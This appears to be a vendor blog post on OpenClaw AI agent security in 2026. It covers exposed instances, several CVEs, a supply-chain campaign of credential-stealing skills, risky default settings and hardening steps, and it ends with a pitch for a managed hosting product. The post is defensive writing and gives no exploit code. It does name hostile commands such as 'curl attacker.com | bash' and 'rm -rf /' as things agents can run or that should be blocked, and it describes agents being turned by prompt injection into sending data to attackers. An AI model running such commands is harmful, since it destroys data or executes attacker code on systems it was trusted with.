OpenClaw Security Risks in 2026: Every Incident, CVE, and Exploit We Found
63% of the 40,000+ OpenClaw instances on the public internet are running vulnerable software right now.
That number comes from Bitsight, not us. We just spent three weeks reading every CVE, every incident report, every Hacker News thread, and every Reddit post about OpenClaw security in 2026.
Here's the honest picture.
It's not pretty. But it's fixable. And knowing the actual risks is step one.
The Exposure Problem: 40,000 Open Doors
OpenClaw is the hottest open-source AI agent platform on the planet. It lets you spin up autonomous agents that write code, browse the web, and run shell commands.
That power is the point. It's also the problem.
Bitsight's research team found over 40,000 OpenClaw instances exposed to the public internet. No VPN. No firewall. Just... sitting there.
Of those 40,000+ instances, 63% were running versions with known security holes.
Worse: 93.4% of exposed instances had authentication bypasses. That means almost every public OpenClaw box lets anyone walk in the front door.
No password. No SSO. No nothing.
How does this happen? Simple. OpenClaw ships with permissive defaults. The docs tell you to lock things down. Most people skip that part.
They spin up a box, connect it to GPT or Claude, give it shell access, and move on. The agent works. They're happy. They never think about who else can access it.
Until someone does.
The CVE Wave: Six Vulnerabilities in Three Months
2026 has been brutal for OpenClaw CVEs. Six confirmed vulnerabilities since January. Here are the ones that matter.
CVE-2026-25253: One-Click RCE (CVSS 8.8)
This is the big one.
A single malicious link could give an attacker full remote code execution on your OpenClaw server. CVSS score: 8.8 out of 10. That's "critical" territory.
The attack was simple. Trick an admin into clicking a link. The link triggers an agent action. The agent runs attacker-controlled code on your box.
Game over.
Microsoft published a warning about this one. So did Cisco Talos. When those two agree on something, pay attention.
CVE-2026-32048: Sandbox Escape
This one scared us.
OpenClaw runs agents in sandboxed containers. That sandbox is supposed to keep agents from touching things they shouldn't. CVE-2026-32048 broke that promise.
The exploit used cross-agent session_spawn to escape the sandbox. A compromised agent could jump out of its container and access other agents' data. Or the host system.
Think about what that means. One bad agent takes down your entire deployment.
CVE-2026-32064: Unauthenticated VNC Access
OpenClaw gives agents browser access through a sandboxed VNC session. Good idea. Bad execution.
CVE-2026-32064 let anyone access that VNC session without logging in. No auth needed. You could watch the agent browse. Or take over the browser yourself.
If the agent was logged into internal tools, those credentials were now yours.
The Pattern
Six CVEs in three months. Each one targets a different part of the stack. RCE. Sandbox escape. Auth bypass. VNC exposure.
This isn't one weak spot. The whole surface is hot.
Patches exist for all of these. But remember that 63% stat? Most people aren't patching.
The Supply Chain Attack: 824 Poisoned Skills
CVEs are bad. This might be worse.
Koi Security discovered a campaign they named ClawHavoc in early 2026. Attackers uploaded 824+ malicious skills to ClawHub, OpenClaw's community skill marketplace.
Think of ClawHub like npm or PyPI, but for AI agent capabilities. Install a skill and your agent gets new powers. Browse the web. Parse PDFs. Send emails.
Or, if you install the wrong skill: exfiltrate every API key and secret in your environment.
The malicious skills looked legit. Professional READMEs. Good star counts (faked). Names close to popular skills (typosquatting).
But buried in the skill code were payloads that grabbed:
- API keys (OpenAI, Anthropic, AWS)
- Environment variables
- SSH keys
- Database connection strings
The data got shipped to attacker-controlled servers. Quietly.
Koi Security estimates hundreds of teams installed at least one poisoned skill before the campaign was caught.
This is the AI version of the event-stream npm attack. And ClawHub still doesn't have mandatory code review for published skills.
The Config Problem: Your Settings Are the Real Vulnerability
Here's the uncomfortable truth.
Most OpenClaw security incidents aren't from zero-day exploits. They're from bad config.
We read through dozens of posts on r/openclaw and Hacker News. The same patterns show up again and again:
1. No auth on the web UI. OpenClaw doesn't force you to set a password. So people don't. Their agent dashboard is one URL guess away from anyone.
2. Unrestricted network egress. Agents can reach any IP on the internet by default. If an agent gets tricked by a prompt injection, it can phone home to an attacker's server. No firewall rules to stop it. (We wrote an entire guide on egress controls and domain allowlists.)
3. Host Docker socket mounted. Many tutorials tell you to mount /var/run/docker.sock into the container. This gives the agent root-level control of your host machine. It's like handing your house keys to a stranger because they promised to only use the bathroom.
4. No action allowlists. OpenClaw lets agents run any shell command by default. rm -rf /? Sure. curl attacker.com | bash? No problem. Without explicit blocklists or allowlists, agents can do anything.
5. Stale versions running in production. Teams deploy OpenClaw once and forget about it. Three months later, they're running a version with five known CVEs. Auto-update isn't on by default.
The Kaspersky team published a report that confirmed this pattern. Config errors cause more breaches than code vulnerabilities. By a wide margin.
China went so far as restricting OpenClaw deployments over these concerns. The South China Morning Post reported that regulators flagged uncontrolled agent access to sensitive systems as a national security risk.
When a nation-state thinks your config defaults are dangerous, that's a signal.
What This Means For You
Let's get practical.
If you're running OpenClaw, here's what you need to do today. Not tomorrow. Today.
Patch immediately
Check your version. If you're behind, update. Every CVE listed above has a patch. There's no excuse for running a known-vulnerable version in production.
Lock down authentication
Put OpenClaw behind SSO or, at minimum, strong passwords. Never expose the web UI to the public internet without auth. Our step-by-step hardening guide walks you through this in 20 minutes.
Sandbox properly
Don't mount the Docker socket. Use a socket proxy with scoped permissions. Better yet, use gVisor or Sysbox for real kernel-level isolation.
Control network egress
Block all outbound traffic except the specific domains your agent needs. If your agent only calls the OpenAI API, it shouldn't be able to reach anything else.
Audit your skills
Don't install random skills from ClawHub. Read the code first. Pin specific versions. Watch for typosquatted package names. Read how 824 malicious skills landed on ClawHub — and how to check if you installed one.
Block high-risk actions
Create an allowlist of permitted shell commands. Block rm -rf, curl | bash, chmod 777, and other obvious footguns. OpenClaw supports action filters. Use them. See our guide on guardrails: what to block, what to allow.
Turn on audit logging
You can't fix what you can't see. Log every agent action. Review the logs. Set alerts for weird behavior.
Consider human-in-the-loop
For high-risk actions (file deletion, network requests, code execution outside the sandbox), require a human to approve. This kills agent speed but saves you from catastrophic mistakes.
The Bigger Picture: AI Agent Security Risks
OpenClaw isn't alone here. Every AI agent platform faces these risks.
NVIDIA built NemoClaw with guardrails baked in. Anthropic's Claude Cowork ships with restrictive defaults. Both are responses to the same problem: autonomous agents with unrestricted access are dangerous.
The difference is philosophy. OpenClaw gives you maximum power and trusts you to lock it down. Others restrict power by default and make you unlock it.
Neither approach is wrong. But one is clearly more dangerous in the hands of a team that doesn't have a security engineer on staff.
And most teams don't.
Frequently Asked Questions
Is OpenClaw safe to use in 2026?
It can be. But most deployments aren't.
93.4% of exposed instances have auth bypasses. That tells you the average OpenClaw deployment is not safe. The software can be hardened. Most people just don't do it.
If you lock down auth, sandbox execution, control egress, and keep patches current, OpenClaw is usable. Skip any one of those steps and you're rolling dice.
What are the biggest OpenClaw vulnerabilities?
Three stand out in 2026:
- CVE-2026-25253 — One-click remote code execution (CVSS 8.8)
- CVE-2026-32048 — Sandbox escape via cross-agent session_spawn
- CVE-2026-32064 — Unauthenticated VNC access to agent browsers
Each one targets a different layer. Together, they cover RCE, isolation bypass, and auth failure.
How many OpenClaw instances are exposed to the internet?
Over 40,000, per Bitsight. 63% run vulnerable versions. Most have no authentication. They're discoverable through basic port scanning.
What is the ClawHavoc attack?
ClawHavoc is a supply chain campaign found by Koi Security. Attackers published 824+ malicious skills on ClawHub. The skills looked real but contained payloads that stole API keys, secrets, and credentials from anyone who installed them.
Can OpenClaw agents escape their sandbox?
Yes. CVE-2026-32048 proved it. Cross-agent session_spawn allowed container escape. The patch exists, but the incident proved that OpenClaw's default sandbox isn't a hard security boundary.
Why did China restrict OpenClaw?
National security concerns. Regulators worried about uncontrolled AI agents accessing sensitive systems without oversight. The South China Morning Post reported the restrictions in early 2026.
What is the most secure way to run OpenClaw?
Behind auth (SSO preferred). With Docker isolation (Sysbox or gVisor, not raw socket mounts). With egress controls. With audited skills only. With audit logging on. With human-in-the-loop for dangerous actions.
That's a lot of boxes to check. Which is the whole point.
One More Thing
We built Clawctl because we got tired of checking all those boxes ourselves.
Clawctl is managed OpenClaw hosting. Every deployment ships with:
- Docker socket proxy isolation — each tenant gets its own container with a proxy sidecar. Agents never touch your host.
- Egress controls — Squid proxy with deny-all default. Only approved domains get through.
- 50+ high-risk actions blocked by default — no
rm -rf, nocurl | bash, no socket mounts without human approval. - Audit logging — every agent action recorded, searchable, and retained by plan tier.
- Human-in-the-loop approvals — dangerous actions queue for manual review before they execute.
- Prompt injection defenses — 9 attack pattern categories detected and blocked automatically.
You can run OpenClaw securely on your own. Many teams do. But if you'd rather not become a part-time security engineer, Clawctl handles it.
Your agents should be building things. Not giving you nightmares.
Related reading: